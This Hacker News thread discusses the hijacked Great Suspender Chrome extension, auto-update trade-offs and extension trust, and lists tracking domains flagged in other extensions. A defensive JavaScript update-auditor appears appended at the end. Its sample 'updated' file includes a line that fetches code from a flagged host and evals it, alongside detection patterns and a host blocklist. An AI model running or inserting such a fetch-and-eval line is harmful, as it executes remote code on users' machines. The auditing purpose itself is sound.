| | Like HN does. What if HN was kicked off a host? They would | put the backups somewhere else and repoint the DNS. | | What if ICE seized their domain? Then we could move domain | name resolution to a DHT. | | What if AT&T refused to carry it or charged extra? The | signal could route packets along other lines. No single | point of failure. | | It's not just about banning 0% or 100% but the prices and | friction imposed by privately owned rent-seeking | infrastructure monopolies. Why, in a span of less than 10 | years, VOIP has caused international calls that used to | cost $3 a minute to turn free and have video! | | The weird thing is that when A wants to connect with B you | think there has to be a one-size-fits-all C that can block | it. | worik wrote: | "Anarchy is simply absence of tall hierarchies" | | No it is not! | ohgodplsno wrote: | Ah, yes, the little project known as Debian completely | failed and never took off. Anarchy is so bad. How could it | ever produce anything of value, like say the world's most | used Linux distribution? | andrepd wrote: | Yes, as we all know, open source software is a failed | experiment, a cesspit of "anarchy". | vlovich123 wrote: | Not open source. Open source is a resounding success. The | marketplace with the problems is advertising. We need to | enact laws banning selling of third party data and make | leaks a liability (perhaps even one that automatically | pierces the normal corporate veil and opens VPs and up to | personal liability if there was any circumvention | initiated or encouraged by them). Then businesses have to | actually decide if the liability is worth it for them vs | a free-for-all market that intelligence agencies and | criminal enterprises are primarily funding. | EGreg wrote: | As well as science, language and other human endeavors. | No one is in charge! I'm glad society advanced so much | from secret alchemy cults with their "intellectual | property" protections on their secrets.
| mixmastamyk wrote: | That's a good description. A successful cesspit of | anarchy. | jbman223 wrote: | Most open source software is neither decentralized nor | publicly owned. | TuringTest wrote: | All of it is, otherwise it wouldn't meet the 4 freedoms | that define open source. | | The 'project' maintaining the software may be | centralized, but all its users "own" the software in the | sense that they don't need to ask permission from the | maintainer, and they can create their own modifications. | hojjat12000 wrote: | You're mixing a few different things. Free software and | open source are different, and for each of them there are | hundreds of different licenses that allow you to do | something but not another. | TuringTest wrote: | Free software and open source are _different marketing | strategies_ for the same concept. The most commonly | understood meaning for both terms is the same, from the | very moment the Open Source Initiative was created. | gmiller123456 wrote: | It seems you've misinterpreted the poster's intentions as if | it should be illegal for a developer to do this. But he/she | was merely informing users, and well-informed customers are a | requirement for capitalism to work. | | The cost of using this extension is your information, and | there are other products available that do the same thing at | a lower cost. Based on the most fundamental concept of | economics (supply and demand), "The Great Suspender" should | fail as a product very quickly. | djrogers wrote: | > so I am not keen to do it again until I have more free time | | Aww man, I'm really sad to hear that RecipeFilter won't be | coming to Safari anytime soon. I really got my hopes up after | it was in the keynote! | | Since Apple distributes extensions in the App Store, have you | thought about charging a buck or two for the Safari version? I | know everyone says this, but I'd pay...
| kazinator wrote: | > _what is your estimated price?_ | | Say, $5 per active user; non-exclusive license: I can maintain | my fork of the extension, and use any of the code in new | projects. | bombcar wrote: | I feel there's a moneymaker here - create a popular open source | extension, sell it off when you get a good deal, fork the code | and let everyone find out the old version is "evil". | twunde wrote: | For those interested in understanding the security of Chrome | extensions, Duo introduced CRXcavator (https://crxcavator.io/) a | while back, which does some risk scoring around permissions. It | is Chrome-only, and it doesn't protect against this type of | attack specifically, although you can look at the Potential | External Communication section for possible issues. | mkj wrote: | It seems auto-updating browser extensions are riskier than | leaving them non-updated? | netsharc wrote: | It'll be a "great" day when someone manages to do big damage | with code that Google hosted and delivered to the victims... | IMO it's just a matter of time. | SiteRelEnby wrote: | Blindly letting _anything_ auto-update. | AQXt wrote: | ...which happens all the time in the free software world, | when you type `apt-get|yum|brew update`. | | What are the odds of one dependency being taken over by a | shady anonymous entity? | mad182 wrote: | Packages in the default repos for some large Linux distros | are usually reviewed and tested by many people until they | make it into updates for the current stable version, so while | it's probably not entirely impossible for some malicious | code to get in, it seems pretty unlikely. Unlike browser | extensions, where the current owner can upload anything | they want and it's pushed to the users without them even | knowing. | AQXt wrote: | How about `npm`, `pip`, `cpan`?... | | We have seen bad updates breaking the entire JavaScript | ecosystem, but they were not intentional.
| | All it takes to inject a bad dependency is a burned out | developer willing to delegate his free project to someone | else... | SiteRelEnby wrote: | It's more the chance of an unexpected breaking change. When | you use a package manager, you're _expecting_ stuff to | change (and get to review what's changing). | | Upgrading manually regularly: Good idea. | | Having a cronjob to do it automatically without user | intervention: Bad idea. | Snarwin wrote: | The fact that you have to manually type in `apt-get update` | (or similar) means it's not automatic. You have full | control over when the update takes place, and which | packages get updated. | spiffytech wrote: | When discussing software updates, I feel like folks on HN | commonly overestimate how much impact the opportunity for | controlling updates has. I haven't seen someone in my | social/professional circles ever hesitate before applying | an apt-get update. Nobody I've known checks changelogs | (except developers checking on direct dependencies), | nobody reads the patches for the updates to verify | nothing malicious slipped in. "There's an update, I'd | better apply it, unless it smells like a breaking | change." | | So in practical terms, my experience is that vanishingly | few people will behave differently than an auto-update | system would behave, except on rare occasions like a | malicious update making the headlines. We definitely need | a solution for rejecting malicious updates, but I feel | backing away from auto updates throws the baby out with | the bathwater and would be a net-negative change for the | industry and for users. | traviscj wrote: | There's also the occasional _necessity_ for making a | breaking change, in particular _breaking some exploit_ | and thereby making the software more secure. | | I don't envy Chrome leadership's decision or having that | problem to solve.
| shawnz wrote: | I don't think the question is about control but rather | whether automatic updates, when intentionally activated | by the user, contribute more positively to the system's | security than negatively. | | Without automatic updates, you might be more inclined to | put off a patch which turns out to be urgent. Or you | might be more likely to lose track of which patches have | been applied across your various systems. | spiffytech wrote: | Auto-update is a mixed bag. We got into auto-update as a | standard practice over the last decade because a large | fraction of users never updated anything, so security issues | would linger forever (not to mention ancient software | versions holding back platform technologies, and financial | concerns for software shops). | | So it's not that auto-update is flatly a bad idea, it's more | that it's a trade-off that sometimes makes security issues | almost evaporate, and sometimes makes them impossible to | dodge. | mkj wrote: | I think the difference with browser extensions is the | anonymity and speed of changing owners. There's more momentum | to notice big companies going downhill (+- stuff like | SourceForge). | Anthony-G wrote: | I recently had to install Certbot on a CentOS 8 server and | discovered that the Certbot documentation recommends using Snap | (for almost every popular GNU/Linux release). They have their | reasons[1]. I figured it was time to investigate using Snap and | the benefits it could provide. | | While researching, I found many users reporting that forced | updates of software installed by Snap caused many problems and | I decided against using it; I was able to install Certbot via a | good old-fashioned RPM from EPEL. | | I also removed Snap from a different Ubuntu server which had | recently been upgraded to 20.04 (I wasn't using LXD on that | server so there was no need for it). | | 1. https://community.letsencrypt.org/t/how-to-install- | certbot-w...
| | FWIW, I've been allowing Apt and Yum package managers to | automatically update for about 8 years without any problems. | The only manual OS updating I do is for a set of physical (non- | virtual) servers that are operational 24/7. | nakodari wrote: | Thanks for this! I've been using this extension for a long time | and just removed it today. Honestly, with the MacBook Air M1 there is | no need for suspending tabs any more because the battery life is | amazing, so that also helps. | weakboi wrote: | Ironically, I tracked the real-world identity of someone using | stolen credit cards in my ecom site BECAUSE he posted a | tutorial/how-to on YouTube showing the vulnerability tool (script | kiddie), under his real name. SMH. This won't stop this | information from being disseminated, but it may save some idiots | from themselves. | mendelmaleh wrote: | I expected this to be about Jack Dorsey/twitter xD | Androider wrote: | In Chrome, make sure you set your less frequently used extensions | to run "On click" instead of "On all sites". Extensions -> | extension details -> Site access. | | For dev tools and such, I set a whitelist of the sites they're | allowed to run on, using that same extension details page. | There's no need for your JSON formatter etc. to run on every | single page you visit. It also speeds up browsing. | brundolf wrote: | Among other things, this is why when people say "HN doesn't need | a dark mode, just use an extension", that isn't a valid solution. | For years now I've refused to install any extensions that aren't | too-big-to-compromise (which in practice - for me - means AdBlock | Plus and maybe React Dev Tools), and that should be everyone's | policy. Any extension whose compromise wouldn't damage the | reputation of a billion-dollar organization is simply too juicy | of an attack vector. | raunakdag wrote: | It's funny you mention AdBlock Plus but not uBlock Origin in | this situation. I'd say the latter is much, much better than | the former.
| brundolf wrote: | But is it better _known_? That's the determining factor | here. The Great Suspender was well-regarded in certain | circles, and even fairly well-known (I've never used it but | I've heard of it). But even it apparently wasn't above | compromise. To be reasonably safe, an extension has to either | be a) so well-known that they'd never be able to get away | with silently adding malware (because someone would notice, | which to be fair is what happened here), or b) tied to a | major brand that wouldn't want to sell out to some shady | firm, on PR grounds alone. | bijant wrote: | This is really Google's fault. They make it impossible to turn | off automatic updates for Chrome extensions from their store. | That would be kind-of-ok if they actually had a rigorous approval | process. But they don't. The Chrome Web Store has become one of | the prime vectors for malware. The only way to be safe is to | exclusively download releases from the extension's GitHub repo and | to manually install them. | Kagerjay wrote: | I never even patch automatic updates to my OS either (e.g. macOS | Big Sur). I'd rather not guinea pig the latest updates and they | usually don't add all that much value for Chrome extension | releases either, so a way to turn off automatic updates in | Chrome is highly desirable for me. | | Downloading and unpacking from GitHub is a pita, I'd need to do | this on each of my computers separately. | smt88 wrote: | This is a terrible security practice. | | Switch to Chromium and use a package manager to stay up to | date. Don't freeze updates, especially on your browser. | sokoloff wrote: | I work in software. I know the dangers of a day 0 exploit. | I also know the dangers of an x.0 release of software. | | Security is often in tension with convenience/usability (as | in this case). | | Concretely: I don't update to the latest macOS on day of | release.
I do update after a few weeks of "no significant | issues reported" (or I'll update manually faster if I learn | of a serious exploit). I still haven't updated to Big Sur as | some of the software that I rely on doesn't work on Big Sur | yet, so I'm on the latest patch of Catalina. | jrochkind1 wrote: | I'm not going to update to a new macOS "named" release | until it's been out for a while and probably has a patch | release or two, agreed. | | But I install macOS patch releases as soon as they are | offered. It has never caused me a problem I am aware of, | and I don't want to miss out on security patches, or even | just bugfixes and perf improvements. | | Heck, I actually just upgraded a MacBook that was still | on 10.12, which was EOL'd. But I upgraded it _because_ it | was EOL'd, and wasn't getting patch releases for | security fixes, and I want those patch releases as soon | as they are released! | smt88 wrote: | You should let clients and users know that you care more | about convenience than security so that they can make an | informed decision about whether to trust their data with | you. | | I don't know what x.0 software updates you're talking | about (Chrome or Mac), but my comment never mentioned | any. You don't seem to know that browser vendors don't | really do those like OS vendors do. Either way, you can | still avoid those while getting security updates. | | In my memory, there hasn't been a breaking auto-update in | Chrome in years, but there have been hundreds of 0-days. | The numbers don't really work out for the tradeoff you | claim to be making. | simias wrote: | I don't think turning off automatic updates would be the right way | to deal with this. See: Windows. If a piece of software becomes | malware it needs to either be forked or retired completely; | running unmaintained legacy versions of software is not | sustainable.
| | I have plenty of things I want to complain about when it comes | to Google's user-adversity but mandatory automatic updates is | definitely not one of them. | | If you're a technical user and really know (or really think | that you know) what you're doing there are ways to effectively | freeze a given version of an extension. | [deleted] | sn_master wrote: | Or just add permissions and ask the user when the extension | asks for new ones? e.g. permission to talk to the outside world, | which something like TGS shouldn't need just to do its job. | LegitShady wrote: | >The only way to be safe is to exclusively download releases | from the extensions github repo and to manually install them. | | Or not use Chrome | metalliqaz wrote: | The fact that Google has not addressed this gaping security | hole in Chrome is borderline criminal. | stevenhuang wrote: | You can do better to voice your displeasure by not stretching | credulity. | metalliqaz wrote: | It's hyperbole. Welcome to the Internet. | AlexandrB wrote: | In general, taking control away from users sets up all kinds of | bad incentives. For example, automatic updates with no way to | downgrade save vendors from having to compete with their own | older versions. This means regressions in functionality or | design can be pushed out with little recourse for users other | than complaining online. This is compounded by ecosystem lock- | in and lack of data portability. The software industry as a | whole is heading towards treating users more and more | paternalistically. | duxup wrote: | On the other hand users are generally pretty poor at managing | software themselves and as long as it works they'll happily | and probably ignorantly run something that is not secure | already and needs an update. | CaptArmchair wrote: | > users are generally pretty poor at managing software | | This is an assertion which begs many questions. | | Who are these users? What do you mean by "generally"? What | do you mean by "poor"?
What do you mean by "managing | software"? Which software specifically? Why is "managing | software" hard? What are specific cases where this might be | true? Is this statement falsifiable? | | For instance, how do age, social background, education | level, language, culture,... factor into the experience of | "managing software"? Surely, the problem can't be software | itself in its entirety? | | See, statements like these tend to break down once you | start digging into the murky nuances and specificities of | reality. | | Moreover, accepting them at face value tends to reinforce a | belief which isn't based on fact: that the users of digital | technology can't manage their devices, and therefore | shouldn't be confronted with managing their devices. | | ... which is then translated and implemented in interfaces | and systems that simply lack the functionality that gives | users fine-grained control over what is or isn't installed. | | Over a longer term, this promotes a form of "lazy thinking" | in which users simply don't question what happens under the | hood of their devices. Sure, people are aware of the many | issues concerning privacy, personal data, security and so | on. But ask them how they could make a meaningful change, | and the answers will be limited to what's possible within | the limitations of what the device offers. | | A great example of this would be people using a post-it to | cover the camera in the laptop bezel. | | People don't know what happens inside their machine, they | don't trust what happens on their machine, and there's no | meaningful possibility to look under the hood and come to a | proper understanding... so they revert to the next sensible | thing they have: taping a post-it over the lens. | | The post-it doesn't solve the underlying issue - a lack of | understanding which was cultivated - but it does solve a | particular symptom: the inability to control what that | camera does.
| strken wrote: | I, and everyone else I know, do not install updates to | our software in a timely manner unless we actively need a | feature. | | Users are "I, and everyone else I know". | | Generally is "unless we need a feature". | | Poor is "do not install updates to our software". | | Managing software is "install updates". | | Software is any software we use that provides updates, | which is all of it. | | Managing software is hard because doing it manually would | require checking the website of every piece of software | you've ever downloaded at regular intervals, where | regular could be as frequently as minutes for security- | critical tools. | | If I ever downgrade my software and lock it to a specific | version, I am now managing it manually, and all of the | above applies. | | I honestly don't think there are unquestioned assumptions | here, because the task of keeping security-critical | software up to date manually is nearly impossible for any | user. | devonbleak wrote: | It really doesn't beg those questions - we have 25+ years | of data backing it up. People across the board are bad | about running updates. I'm guessing you missed the mid-to- | late 90s when things like buffer overflows started to be | exploited and firewalls became necessities because even | the folks whose job it was to run updates of vulnerable | systems with public IPs on the Internet... weren't. Then | came the early 2000s and all the worms running amok | because people still weren't running their updates. Then | the collective web development industry screamed in pain | because things like Windows XP and IE6 just would not | die. | | The collective Internet has been through this before and | (mostly) learned its lesson. People don't run updates | when it's not shoved down their throat. And it's not a | small segment of people. And it hasn't changed. Look at | how many hacks still happen because of servers and apps | that aren't patched for known vulnerabilities.
Or the | prevalence of cryptojacking, which is still largely based | on known vulnerabilities that already have patches | available - indicating it's successful enough that people | keep doing it. | | Most users don't question what happens under the hood of | their devices because they don't care. They have other | things to care about that actually mean something to them | besides the nuances of the day-to-day maintenance of | their devices. There does not exist an effective way of | making people care about things like this, let alone | educating the masses on how to appropriately choose which | commit hash of their favorite browser extension they | should really be on. How many security newsletters do you | really expect the average person to be subscribed to in | order to make informed decisions about these things? | | Hell, my "Update" notification on Chrome is red this | morning and I'm at least in the top 10% of security- | conscious folks in the world (it's really not a high | bar). | | I'm not saying automatic updates are without their | problems - I'm in a thread on HN about that exact thing. | But trying to claim it's somehow about sociodemographic | issues and the answer is solving that and going back to | selectively running updates is just ignoring the lessons | of the past. | duxup wrote: | I honestly am not at all sure what you mean by much of | that. | | Demographics don't change the fact that if you don't | automatically update software, many users simply won't. | That's bad. | jjkaczor wrote: | ... in the usual pedantry of HN your use of "poor" was | interpreted to mean socio-economic, rather than... "just | bad at something"... | duxup wrote: | Oh I see. That's weird, but thanks for letting me know. | Someone wrote: | I don't see how one could parse _"On the other hand users | are generally pretty poor at managing software | themselves"_ and assign that interpretation to _"poor"_.
| duxup wrote: | I agree, but the user who responded to me seemed to talk | about demographics as if I had meant "poor" as in not | having much money. | | The internet is global, sometimes I think things get lost | in translation. | wolco5 wrote: | That would cover users who are poor at managing software. | Being able to turn them off would require someone to be | good at managing software. Why remove control from those | users? | duxup wrote: | I want to think that folks who would choose that option | would be responsible, but the amount I hear from other | developers who defer updates on Windows 10 to the maximum | (1 year...) and still are upset when they have to reboot | makes me think that even experienced users present a | risk. | ziml77 wrote: | I don't _want_ to be saying that we should remove | control, but I actually do think it's reasonable to. | Even on a single-user device, security issues are not | isolated. An infected machine will likely be used for | things like spam and DDoS. | | If you make something available for people to toggle that | improves their experience, people are going to take | advantage of that even if they don't really grasp or | decide to ignore the consequences. In the case of updates | the improved experience is not being nagged or forced to | restart an application or the whole OS. And unfortunately | the only way to really gatekeep that control to people | who know what they're doing is giving it enterprise | pricing. | iamben wrote: | Conversely, before automatic updates web developers were | stuck supporting Internet Explorer for the best part of | twenty years. Many of the people using it had neither reason | nor knowledge to update it, and it became the reason my | parents' computers got riddled with malware. | | There's a sensible middle ground here. Take the paternalistic | approach that (generally) protects people like my mum. Add | settings that allow people like you and me to turn off | updates or roll backwards.
Push the people controlling the | updates (like the Chrome store) to better protect their | users. | marcosdumay wrote: | Internet Explorer was only replaced by automatic updates | _after_ its usage fell enough that sites stopped supporting | it. | ryandrake wrote: | Users need to be motivated to upgrade. If their current | software works sufficiently on the sites they care about, | then they have no need to upgrade. If the sites themselves | are enabling this behavior, by bending over backwards to | work with old browsers, then they are part of the | "problem". | | I don't like automatic updates and generally keep them | disabled. Software upgrades tend to reduce functionality | and instead force unnecessary UX redesigns on users, so I'd | rather avoid them. I _wish_ developers had the [EDIT: | incentive] to release security patches independently from | functionality changes, but few do that anymore, sadly. | ComodoHacker wrote: | >I wish developers had the competence to release security | patches independently from functionality changes, but few | do that anymore, sadly. | | You do realize it's not competence developers are | lacking, it's resources that are finite, don't you? | iamben wrote: | It's been an age since I've worked in an agency, but back | in the IE era, at least once a month a dev would ask to | use a 'modern feature'. Something to support a new | piece of design from the design team, or save hours or | days of dev, or remove the need for hacky 'fixes' that | could be done cleanly with modern browser support. | | So off to analytics they would go. "X thousand users are | using IE8. We're converting at X%. Removing support for | IE8 just means these people will shop elsewhere and we'll | lose X thousand pounds a month. You need to support IE8." | | Believe me, I wish it was as simple as saying developers | are "part of the problem," because it would be an easy | fix. But try selling that (without a huuuuge struggle!)
| to the person who holds the purse strings. | | Sadly the new features usually only came on new sites. | It's much easier to push it through when you're not | cutting off an existing income stream. | corty wrote: | Despite automatic updates, web developers are still stuck | with Safari, IE, old android browsers and old edge. | Automation doesn't help with bugs and functionality if | there are just no updates to be installed that fix bugs and | bring new functionality. | username90 wrote: | The major problem with internet explorer was that it was | impossible to update without updating windows which costs | money so most people and organizations didn't do it. | mikewarot wrote: | >Conversely, before automatic updates web developers were | stuck supporting Internet Explorer for the best part of | twenty years. Many of the people using it had neither | reason or knowledge to update it, and it became the reason | my parent's computers got riddled with malware. | | The failure is not that of Internet Explorer, but rather | the OS in which it runs, which has a faulty security model. | No operating system should trust executables with | everything by default. | Spivak wrote: | It wasn't faulty at the time since people were more | concerned about protecting computers from users than | protecting users from applications. | | We all seem to forget that computing has changed | _drastically_ in the last decade. | ColonelPhantom wrote: | I would say that "protecting users from applications" (or | at least, external attackers) has been commonplace for | maybe even two decades now, ever since major malware | 'plagues' of the early 2000's (pre-SP2 Windows XP) like | Blaster or Sasser. | | That said, in that era it was often assumed (more so than | now) that software the user installed himself is trusted. | Cthulhu_ wrote: | I don't mind automatic updates per se as long as they're | thoroughly checked and vetted. 
I'm not convinced Android and | the Chrome web store do ANY checking / vetting. I have more | trust in Apple's stores. | | Vetting could be better with a lot of companies as well; | remember not so long ago when Windows Defender decided a | critical system file was malware and broke a ton of systems? | | Verification. Vetting. Gradual release. Automatically disable | extensions if they changed ownership, or if there's | suspicious activity on the account of the owner (e.g. new | login in another country). | | And they need to take a MUCH harder stance on malware. Right | now they're not even acknowledging there's a problem, let | alone acting on it. | londons_explore wrote: | For any extension that makes any money, the solution is a | deposit scheme. | | "Google will withhold $1 per user of your ad revenue | forever. If your extension is found to contain malware, you | forfeit all the $1's. Decisions on malware'y ness shall be | made by XYZ malware researchers." | | Allow a developer to get back their $1 when a user | uninstalls the extension, or the developer stops making the | extension. Also give the developer a certificate anytime | showing how many $1's you hold of theirs (they could use | that to get a loan from someone willing to trust them not | to distribute malware). | PetahNZ wrote: | Not really a solution, just the minimum price a buyer | would need to pay. | londons_explore wrote: | True. But even the most profitable malware won't want to | forfeit hundreds of millions of dollars for a popular | chrome extension. | jrochkind1 wrote: | Users never upgrading their software certainly also leads to | security problems though, it's not a solution, and it is | reasonable to try to set things up so this doesn't happen. | ThisIsTheWay wrote: | Wouldn't an easy solution be to turn auto updates on by | default, and warn users that turn it off that they are | opening themselves up to potential security issues, and to do | so wisely? 
| velosol wrote: | The issue comes when an auto update regresses something | that the user relied upon. As long as the automatic update | has a 'downgrade' option that's tenable but most of the | solutions out there make downgrading difficult. | | I prefer automatic updates that are presented to the user | for action, sadly feature update/release notes are often | hidden or content-free (cf. Google's apps' updates on the | Play Store) and downgrading path varies heavily with OS | (easy on Linux, impossible on iOS). | Paul-ish wrote: | I keep most of my extensions disabled most of the time. A lot of | the extensions have particular uses and don't always need to be | active. | imedadel wrote: | I recently switched to Auto Tab Discard.[1] It uses the browser's | built-in tab suspending. It doesn't have all the features of TGS, | though. | | Edit: OneTab[2] is also pretty good when you have lots of tabs | open for research or work. | | [1]: https://github.com/rNeomy/auto-tab-discard | | [2]: https://www.one-tab.com/ | anotheryou wrote: | perfect! I was looking for [1] the other day. Plays nicely with | sideberry which uses the same api but can't do "unload all | other tabs". | Debug_Overload wrote: | I've been using it for the last few weeks, and it's been pretty | good so far. It doesn't suspend music tabs when they're not | playing (which TGS did automatically), but nothing much to | complain about. | ext_dev wrote: | Was once approached by a company who had software that would | allow me to install affiliate links on Google Searches results by | installing a third party on my extension. | | Had about 50k active users at the time and was making around | EUR1.8k a month.[1] To be honest, users were informed on the | install flow and most people didn't care what I was doing. | Probably how Hola unblocker still has 8M. | | Google understandably told me to remove it. | | Donations inside extensions offer near nothing. 
Doesn't feel like | an extension that can offer a paid tier. | | It's a dirty but effective way to generate an income stream | relatively quickly. Even more so, if you wash your hands from it | and walk away. | | I'm surprised Google hasn't taken it down completely, as it | breaks the single use policy. | | [1] https://i.imgur.com/M4CD9CB.png | SiteRelEnby wrote: | Either the second or third time it lost all my tabs was when I | stopped trusting it. | frob wrote: | Google Chrome now has tab grouping. In Beta, you can click on the | group name and collapse the tabs. Based on their reload times, it | seems chrome suspends the tabs in the background when you | collapse the group. | katsura wrote: | Oh, this is awesome. I'm on Linux so I've been using Chromium, | where this is already available. Pretty neat. | | Edit: looks like it works in Chrome as well. | nottheonion wrote: | This looks promising. To activate the suspend on collapse | feature enter "chrome://flags/" into the address bar and make | sure these experimental features are "enabled": #tab-groups, | #tab-groups-collapse, #tab-groups-collapse-freezing. I also | enabled: #tab-groups-auto-create. | EGreg wrote: | And this is why we need to rethink how we do software | distribution. | | Package managers are nice for the lazy, but then we get stuff | like this: | | https://qz.com/646467/how-one-programmer-broke-the-internet-... | | Actually you might be pulling a bunch of malicious updates in 2-3 | modules deep in your dependency tree anytime. | | As a society we should be moving away from a culture of | "immediate" updates eg on Twitter etc. And go towards more "peer | review" like in science. Otherwise we are putting responsibility | on every individual to verify all sides of the story and get | informed. They don't and society gets more and more divided. | Imagine if a scientist tweeted at 3am and half their followers | instantly believed them. 
Or if an open source contributor's pull | request was instantly accepted and pulled overnight by everyone. | That's why USA and other countries are now so divided | politically. Individual responsibility of 100% of the downstream | nodes is strange to outsource responsibility to. | | I wrote about this back in 2012 predicting what would happen: | | https://magarshak.com/blog/?p=114 | Mediterraneo10 wrote: | Recently I wanted to build one of Signal's libraries so that I | could use it with signal-cli. It astonished me that building | this secure messenger requires automatically downloading a | whole host of third-party dependencies through wget from some | disparate repositories, which presumably had received little | vetting. | | What happened to the notion of using stable, centralized | package repositories like Debian's or Red Hat's in order to | build one's software? I did a lot of Free Software development | in the early millennium, then was away from the scene for a few | years, and when I came back this desire for convenience above | all else really baffles me. | EGreg wrote: | At Qbix, we have built everything in-house and the few | dependencies that we do pull in, we vetted and pinned the | versions. People have criticized us for that in the past but | if we are ever to get past trusting large, centralized | entities for our server back ends, we need to make sure to | kick the open source movement to the next level: | | https://qbix.com/blog/2021/01/15/open-source-communities/ | | https://qbix.com/blog/2018/01/17/modern-security- | practices-f... | specialist wrote: | Thanks for sharing. | | I'm now framing the problem as "inauthentic speech". | | > _...go towards more "peer review" like in science._ | | Ditto journalism and reporting. | | This is a universal problem. The core solution remains the | same. 
| Cite your sources | Show your work | Sign your name | | WRT John Walker's screed, I really thought certificates and web | of trust would have become the norm by now. Anything unsigned | would be treated as gossip or worse. Certs could be revoked as | needed. | | Further, every trusted digital relationship would start with a | key exchange. Vs relying on username and password. eg Banks | would issue me a Secure Enclave of some sort, like a USB fob. | | I'd like to understand why this didn't happen. My best guess is | "Worse is better" enabled predators and parasites. Which has | been acceptable during the gold rush. | tus88 wrote: | "Shady" take-over of plugins/apps is just as big a suspicious fail | as allowing apps to gain access to all contacts on mobile phones. | | Google never really cared about user privacy at all. | cwwc wrote: | Lifesaver. Much obliged, davidfstr. | facorreia wrote: | That's why I don't trust Chrome extensions. There have been too | many instances of a popular extension being taken over to run | malware. I don't think Google's handling of these security issues | has been adequate. | AlexCoventry wrote: | Is there a tool which will automatically reload _all_ your | extensions from disk, as described in the OP? Seems like a | sensible default, from a security perspective. | nojito wrote: | Sleeping Tabs is a feature on MS Edge. | | https://www.windowscentral.com/microsoft-edge-canary-can-put... | bugfix wrote: | Wow, my Chrome RAM usage went from about 2GB to 8GB after | removing TGS. | aitchnyu wrote: | Why didn't browsers start warning users when an extension updated | after changing owners? 
| davidfstr wrote: | <nope>The owner in the extension metadata on The Great | Suspender hasn't been updated (to my understanding) so the | Chrome Web Store doesn't even know that the owner has been | changed.</nope> | | Actually it does appear that the owner was changed from | "deanoemcke" to "thegreatsuspender" (the new mystery owner) on | the Chrome Web Store page. | | I agree that warning when updating an extension if the stated | owner has changed would be valuable. | kburman wrote: | Here's a list of other extensions which have been recently flagged | by community for similar behaviour | | - Auto Refresh Premium, static.trckljanalytic.com | | - Stream Video Downloader, static.trckpath.com | | - Custom Feed for Facebook, api.trackized.com | | - Notifications for Instagram, pc.findanalytic.com | | - Flash Video Downloader, static.trackivation.com | | - Ratings Preview for YouTube, cdn.webtraanalytica.com | | Copied from | https://github.com/greatsuspender/thegreatsuspender/issues/1... | sn_master wrote: | I wonder how many of those tracking websites or even the | extensions themselves are owned by the same entity. That's a | pretty common practice. | ramraj07 wrote: | My general policy is to never install any extension that has | full browser access. Except if it's from the faang companies | themselves. | ant6n wrote: | I wonder whether paying for extensions could be a way to build | more trust. | rplnt wrote: | Is there an extension that can track my extensions? | jhloa2 wrote: | I was just thinking about something similar. It would be nice | if at a minimum, we could put together a list of compromised | extensions. I feel like I've seen quite a few of these | reports recently | pault wrote: | It should be possible to look at the source code of known | compromised extensions and put together a list of | heuristics that could automate part of the process. | Minifiers make it more difficult though. 
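The two wishes above (aitchnyu's "warn when an extension updated after changing owners" and pault's "list of heuristics" that could be automated) can be combined into one small check a user runs before accepting an update. What follows is an added example, not code from the thread, from The Great Suspender, or from any extension named here: it takes a last-known-good snapshot of an extension and the freshly updated one, and reports new permissions, new remote hosts in the source, contact with the community-flagged hosts from kburman's list, and newly introduced dynamic-code patterns. The snapshots, manifests and source strings are constructed inline so it runs offline under Node.js; in practice you would read manifest.json and the *.js files from the two unpacked directories.

```javascript
// Added example: audit an extension update against a known-good snapshot.
// Node.js, no dependencies. Not part of any real extension's code.

// Hostnames the thread reports as flagged by the community (kburman's list).
// Swap in any other blocklist you trust.
const FLAGGED_HOSTS = new Set([
  'static.trckljanalytic.com', 'static.trckpath.com', 'api.trackized.com',
  'pc.findanalytic.com', 'static.trackivation.com', 'cdn.webtraanalytica.com',
]);

// Not proof of malice, but things that deserve a look when they first appear:
// they let behaviour be decided by a server *after* store review.
const RISKY_CODE = [
  [/\beval\s*\(/, 'eval()'],
  [/\bnew\s+Function\s*\(/, 'new Function()'],
  [/\bimportScripts\s*\(/, 'importScripts()'],
  [/document\.createElement\s*\(\s*['"]script['"]\s*\)/, 'dynamic <script> injection'],
];

// Every http(s) hostname literal in a piece of source. Minified code keeps
// its string literals, so this survives minification better than AST checks.
function hostnamesIn(source) {
  const hosts = new Set();
  const re = /https?:\/\/([a-z0-9.-]+\.[a-z]{2,})/gi;
  let m;
  while ((m = re.exec(source)) !== null) hosts.add(m[1].toLowerCase());
  return hosts;
}

// MV2 keeps host patterns in "permissions"; MV3 moves them to
// "host_permissions". Collect both so the diff works for either.
function manifestPermissions(manifest) {
  return new Set([...(manifest.permissions || []), ...(manifest.host_permissions || [])]);
}

// snapshot = { manifest: <parsed manifest.json>, files: { 'name.js': '<source>' } }
// Returns a list of human-readable findings; an empty list means "nothing new".
function auditUpdate(oldSnap, newSnap) {
  const findings = [];

  const oldPerms = manifestPermissions(oldSnap.manifest);
  for (const p of manifestPermissions(newSnap.manifest)) {
    if (!oldPerms.has(p)) findings.push(`new permission: ${p}`);
  }

  const oldHosts = new Set();
  for (const src of Object.values(oldSnap.files)) {
    for (const h of hostnamesIn(src)) oldHosts.add(h);
  }

  for (const [name, src] of Object.entries(newSnap.files)) {
    for (const h of hostnamesIn(src)) {
      if (FLAGGED_HOSTS.has(h)) findings.push(`${name}: contacts community-flagged host ${h}`);
      else if (!oldHosts.has(h)) findings.push(`${name}: new remote host ${h}`);
    }
    const before = oldSnap.files[name] || '';
    for (const [re, label] of RISKY_CODE) {
      if (re.test(src) && !re.test(before)) findings.push(`${name}: newly uses ${label}`);
    }
  }
  return findings;
}

// Constructed sample data (not real extension code): a known-good version and
// an update that widens permissions and pulls code from a flagged host.
const KNOWN_GOOD = {
  manifest: { manifest_version: 2, version: '1.0.0', permissions: ['tabs', 'storage', 'alarms'] },
  files: { 'background.js': "chrome.alarms.create('sweep', {periodInMinutes: 1});\n" },
};
const UPDATED = {
  manifest: { manifest_version: 2, version: '1.0.1', permissions: ['tabs', 'storage', 'alarms', '<all_urls>'] },
  files: {
    'background.js':
      "chrome.alarms.create('sweep', {periodInMinutes: 1});\n" +
      "fetch('https://static.trckljanalytic.com/cfg.js').then(r => r.text()).then(s => eval(s));\n",
  },
};

if (typeof require !== 'undefined' && require.main === module) {
  const findings = auditUpdate(KNOWN_GOOD, UPDATED);
  console.log(findings.length ? findings.join('\n') : 'no changes of interest');
}
```

A clean update (same permissions, same hosts, no new dynamic-code patterns) yields an empty list; the constructed update above yields three findings: the `<all_urls>` permission, the flagged host, and the new use of `eval()`. The owner-change warning aitchnyu asks for is something only the store can provide, since the manifest does not carry the publisher identity; this check covers what the user can see locally.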
